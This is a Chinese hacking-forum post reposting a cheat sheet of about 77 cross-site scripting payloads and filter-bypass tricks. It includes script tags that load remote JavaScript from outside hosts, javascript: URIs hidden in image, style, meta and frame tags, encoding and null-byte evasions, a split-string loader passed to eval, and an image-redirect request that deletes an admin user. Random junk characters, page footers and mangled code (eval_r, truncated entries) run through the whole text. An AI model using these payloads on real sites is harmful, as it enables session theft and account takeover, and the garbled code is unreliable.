貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" e d+ u7 T" _' N; o- i(1)普通的XSS JavaScript注入
) a4 o8 x+ o4 Y/ { ]0 [<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" J) h0 e# Y, v(2)IMG标签XSS使用JavaScript命令) l3 {4 h( [ K! ^/ x! k+ s7 g* n! H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* f$ `. o: ?$ M( h4 l3 ~3 ?(3)IMG标签无分号无引号4 k: z7 F0 z" ?7 F& \6 J$ p
<IMG SRC=javascript:alert(‘XSS’)>
3 z6 Y5 s0 E- O7 q w(4)IMG标签大小写不敏感
0 b4 }: K. Y9 C- L' ~" v1 j; q<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! `6 V7 K& ~; h6 s$ N p(5)HTML编码(必须有分号)
0 ] q) H9 t. [8 B8 r% G( n<IMG SRC=javascript:alert(“XSS”)>
' b6 ]" e6 p) X/ | m7 s) ^8 O* M0 A(6)修正缺陷IMG标签
9 _" @" _4 G9 S# y! j6 G7 ?# ~<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. e: f9 {' `; Y4 A2 g; d' @
3 E3 V( E) b; j9 J6 d# i- G
9 f- G- @" o/ O% [, c(7)formCharCode标签(计算器)
F8 z1 Q1 b0 F<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. l9 w- @# E. ^( S" O. L+ l& B3 B$ P(8)UTF-8的Unicode编码(计算器) X% D. N" s, w1 j4 P
<IMG SRC=jav..省略..S')>1 W, D9 ~; B, z& o! l
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 w# d( S% Y0 I& Y: D2 y<IMG SRC=jav..省略..S')>) I( R3 J( {* k7 F* w) \$ u6 l; w8 Z
(10)十六进制编码也是没有分号(计算器)# Z2 p) o6 f! i+ B H
<IMG SRC=java..省略..XSS')>
, d- K3 V2 p) l$ ?+ _; J [$ X(11)嵌入式标签,将Javascript分开
9 Y. a2 T2 c! R9 A1 t+ o<IMG SRC=”jav ascript:alert(‘XSS’);”>
- \' ?* d% T1 b! F( d2 W0 `6 \(12)嵌入式编码标签,将Javascript分开
2 s! F( {5 ?4 |<IMG SRC=”jav ascript:alert(‘XSS’);”>: ^: p$ e- ] p, P X
(13)嵌入式换行符
9 p+ M% }3 D4 D! m<IMG SRC=”jav ascript:alert(‘XSS’);”>1 @! K( k6 c5 n
(14)嵌入式回车
( Y, v( L; k* }- Q6 ~; Q3 z3 l<IMG SRC=”jav ascript:alert(‘XSS’);”>; V, g% Q. L& O U2 l: Z E
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) `8 y7 n }% z0 `8 \$ g# ~7 c<IMG SRC=”javascript:alert(‘XSS‘)”>
' q& g" n9 ]3 W(16)解决限制字符(要求同页面)
/ P: t" B7 f, ~<script>z=’document.’</script>( S4 l$ k, C* j# D; J
<script>z=z+’write(“‘</script>4 n5 d+ E9 T" t S, a
<script>z=z+’<script’</script>
. k9 `% |1 G |) \7 n<script>z=z+’ src=ht’</script>* ]4 a5 \: V! ]/ \
<script>z=z+’tp://ww’</script>
1 R- _+ F+ a* p9 v. t( k<script>z=z+’w.shell’</script>
7 k. R! U* j+ I% t4 g$ k<script>z=z+’.net/1.’</script> C& H7 P, o/ u: V4 W
<script>z=z+’js></sc’</script>: L0 z8 |$ g. J
<script>z=z+’ript>”)’</script>- b; l) g* F: y$ Q4 k' o
<script>eval_r(z)</script>
+ k; r* \! t! M, o- L& ~. U9 e(17)空字符12-7-1 T00LS - Powered by Discuz! Board* w( g8 c8 v( a4 R9 g0 S$ C
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
% R L1 }4 S) A& C$ x+ iperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 K2 }- r$ a7 L% f. Q(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ J+ T: ~' h |% C0 i! V& u. iperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, X, ~% X7 o9 S% O r& w(19)Spaces和meta前的IMG标签8 E8 i8 g% y5 N; R: N/ J; {
<IMG SRC=” javascript:alert(‘XSS’);”>" |7 y F2 z' U2 p
(20)Non-alpha-non-digit XSS
7 \; K& h( T% I' A3 z$ f<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 \. E( a5 I+ \2 {(21)Non-alpha-non-digit XSS to 2
0 W {- D2 r/ |; c7 N<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- X/ B( w6 n1 n* J) m(22)Non-alpha-non-digit XSS to 3
1 |% k9 U' K1 h4 \2 @<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; q) A7 w5 |+ ^5 ?: i8 K
(23)双开括号
+ e+ I& ?/ P0 p# s$ c" n<<SCRIPT>alert(“XSS”);//<</SCRIPT>3 h8 ?1 @ T+ W1 @! F, A4 E5 ?) ~
(24)无结束脚本标记(仅火狐等浏览器)3 b5 a" Y% o& v B: K
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>7 Z, R7 p' Z8 `0 }
(25)无结束脚本标记2
8 I, O9 H% _+ Y" {4 `1 C<SCRIPT SRC=//3w.org/XSS/xss.js>% B: z( B: y" D3 _) t
(26)半开的HTML/JavaScript XSS
4 [9 V1 q5 E4 v/ _9 S" \<IMG SRC=”javascript:alert(‘XSS’)”
& ]1 C) p7 }9 k4 D3 z(27)双开角括号. o2 a. K) \) p. ?5 _
<iframe src=http://3w.org/XSS.html <3 V7 P. D+ R! {
(28)无单引号 双引号 分号: t- y. _) V# `0 O1 j
<SCRIPT>a=/XSS/
7 c$ {. c0 z# S. Qalert(a.source)</SCRIPT>) Z. `: M4 l& t% f W y$ S/ O7 _% \
(29)换码过滤的JavaScript% z5 |/ j" G% ]0 A4 }
\”;alert(‘XSS’);//
) b$ b, Y" |& i+ J6 o4 D(30)结束Title标签) r% n7 y- g3 n8 w/ H
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 n8 F1 L* Q3 L( ~(31)Input Image
4 b$ v( f# z0 a5 A<INPUT SRC=”javascript:alert(‘XSS’);”>
$ ~4 b: K( v' h# l3 }(32)BODY Image
5 e' w$ z! h2 C8 [6 T4 L5 b<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- c! z4 v9 B* ^6 x0 ?0 l(33)BODY标签5 ?: M' I+ }, k! K5 ]* _/ X- s; g
<BODY(‘XSS’)>
7 q! k! x9 S# t4 K(34)IMG Dynsrc
/ L3 T# m) }4 e( K/ U" {<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: m7 V0 M% v8 d3 C4 ?- f(35)IMG Lowsrc: C6 ^. L6 a' T1 K) U! B+ Y
<IMG LOWSRC=”javascript:alert(‘XSS’)”>% T7 g. v5 a* P& i5 R+ Q: H
(36)BGSOUND6 j/ @( O$ B8 h" ~
<BGSOUND SRC=”javascript:alert(‘XSS’);”># C$ @5 Y1 L% n) a# r
(37)STYLE sheet" B1 ?* b6 G1 g8 G2 i
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ }( B' r+ c$ U* I. t* X* i! s5 C
(38)远程样式表
" d/ }" s! {" o# C<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' O! E% G3 ^. p
(39)List-style-image(列表式)8 K: v5 `4 @1 y" {' z' \) ]# v! w
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; D4 y% j" [' q9 y8 h) `! l$ g9 E t(40)IMG VBscript
4 `! M& `& i: e0 R) |7 {- {<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS- f. S6 O9 s& O3 X
(41)META链接url2 L6 O0 F& m/ ]" P N/ I- `" U
: ]' D/ j2 x$ b0 |
2 U; n" f* L) S' q; V
<META HTTP-EQUIV=”refresh” CONTENT=”0;
% A9 K8 m' \+ X4 e/ X5 OURL=http://;URL=javascript:alert(‘XSS’);”>+ D$ m7 j {) _* x
(42)Iframe0 k! P- d5 n) p" }- \" o$ J4 W
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, ?/ X% K. v0 k! t(43)Frame; b* g! L* ?8 x
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board& i. G( a: }) r+ l
https://www.t00ls.net/viewthread ... table&tid=15267 3/6! X" u$ y e3 @5 m0 g4 J) Z" H
(44)Table
! Q2 F' K) R, {, @<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ J) H( i8 y Z& U: }3 a' y
(45)TD
5 {& }. u; g3 E& T. O+ G* F8 p<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ x; _; w' f5 k; X/ H* D+ J! m(46)DIV background-image
& `9 v. A7 ?9 S<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& Q: f4 V3 }. |0 H0 Z' ~(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
0 k! {. Q1 ^5 v6 ?4 ^8 I; j% X! o$ n8&13&12288&65279)/ s0 R V2 }5 M) v) S0 {% M
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' h/ ?7 h! y! f# q4 N }; N( ]2 f(48)DIV expression
6 W _8 k9 P& ^9 ~7 |6 }. R% I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 V' I2 K, E5 p, p3 y; b! K(49)STYLE属性分拆表达+ K5 g h. b* p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 t/ t4 a1 y2 H( Y D# [6 C
(50)匿名STYLE(组成:开角号和一个字母开头)
- c. r, K2 l3 ^. t<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; f% |. A1 y# M(51)STYLE background-image
Y D( O* Z* y/ V6 g<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# |6 q/ X( r9 W3 h: A5 J' L
CLASS=XSS></A>. c& F& H1 i. k- M& C
(52)IMG STYLE方式 J' S; r3 g6 f# H6 `/ Y a r5 I
exppression(alert(“XSS”))’>- s. B0 K- X5 C" P+ y9 @
(53)STYLE background
4 }; J- _: R7 W6 Q" C<STYLE><STYLE6 E- e" y5 t% n, F5 T& b
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 z$ E- T: ^3 |/ u( l
(54)BASE" f8 e8 k3 v' [% f
<BASE HREF=”javascript:alert(‘XSS’);//”>
/ S3 X- l; [8 l(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& o$ v2 g( K/ x g9 A
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 H M# d" `3 m(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 |. P% x# {! Z/ ya=”get”;
- p! U3 J! P2 [5 Q* l! z3 x' ub=”URL(\”";
0 f i* [8 C% Vc=”javascript:”;2 V7 M* y- \( s# b9 B; ]0 u7 A
d=”alert(‘XSS’);\”)”;
, t T0 U/ l4 X7 x4 Ceval_r(a+b+c+d);
+ W" S7 y3 v! C(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 m6 R- L1 v) w8 S' {) s<HTML xmlns:xss>
0 C7 i; F' c. e/ ]<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( G% e8 S6 i9 l& q0 m
<xss:xss>XSS</xss:xss># p' S$ \1 W' M' i8 H
</HTML>- i! b4 `. Y7 m7 {; T
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用( K* w# I' n) W5 L
<SCRIPT SRC=””></SCRIPT>$ q( i3 V) a1 \! V6 z
(59)IMG嵌入式命令,可执行任意命令& o! E4 c8 \) H& }7 g. ~4 |
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# s3 ~1 z& A, F; y1 b- u- I- f(60)IMG嵌入式命令(a.jpg在同服务器)
+ ~6 X+ U! E0 N# i/ y. pRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
- w1 F; ]# q, A2 f- E(61)绕符号过滤
q. R) P; |+ E8 ]4 z* s, A* J<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( R& Z' n8 x5 y* d
(62)
5 U- r/ x3 w9 D0 j. K<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 X7 O3 X; ^: T/ I' m% h
(63)
% S6 i; X4 x: u1 _- ]: m<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 a3 R ~' w0 W, _- @(64)
: ^* h/ E8 F4 C8 {' Y8 q' W* \<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# D( W" Z# I+ B/ }$ u1 q(65)2 U1 G* B3 x; B$ _
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>0 s2 v1 E8 P( u# C
(66)12-7-1 T00LS - Powered by Discuz! Board M9 @2 ?$ {& a5 A% \
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
. Y+ d3 t1 z: G, a$ T' ?<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
; U: h- U/ U D5 K* K) f(67)
o! O0 ^6 d9 c$ N( D<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>1 f' Y" m5 S: e% h- C
</SCRIPT>
$ X& m/ f& O! M9 w. H: H2 F(68)URL绕行
2 p& g* v: }* N; [' w<A HREF=”http://127.0.0.1/”>XSS</A>
( c' f9 Z2 |7 J5 V5 h& D f- T(69)URL编码
# \- W0 b9 m% p# j+ w<A HREF=”http://3w.org”>XSS</A>
H5 a: g% d. A- e3 u3 q" H& H(70)IP十进制1 l# n, T% I! G0 q
<A HREF=”http://3232235521″>XSS</A>& S: A* ?+ _9 ~1 g% J
(71)IP十六进制
0 T% C3 m& u% j1 u- j. y<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> B" L( ?9 H s- g0 f
(72)IP八进制
+ D0 m. G6 c' a$ y; @<A HREF=”http://0300.0250.0000.0001″>XSS</A>( q/ @+ `0 a- P$ [4 h, ^
(73)混合编码
5 X# S& l. p: p) p4 s<A HREF=”h
0 |( O' B& G% c4 H+ Q- I" ptt p://6 6.000146.0×7.147/”">XSS</A>
: z- p9 e z% G2 V- T(74)节省[http:]
' V% N: }: |8 p& N/ {) y<A HREF=”//www.google.com/”>XSS</A> O; B* Z( Y# p$ `7 F1 }" v; q. j
(75)节省[www]9 A) b) d7 y- g; g5 q: a0 _
<A HREF=”http://google.com/”>XSS</A>
& u9 V3 m! W1 M, e) i8 d6 P(76)绝对点绝对DNS
) z* ?" Y9 W' K( q<A HREF=”http://www.google.com./”>XSS</A>
! |' e0 y4 X6 c(77)javascript链接1 x* T: X1 `" d
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>0 V. b6 C( @7 J, K
' S) B9 m5 _+ [4 \- @
原文地址:http://fuzzexp.org/u/0day/?p=14/ z3 F. W0 h7 n2 J; v3 ?
3 N* v; L+ k- D
|
发表于 2013-4-19 19:22:37
收藏
支持
反对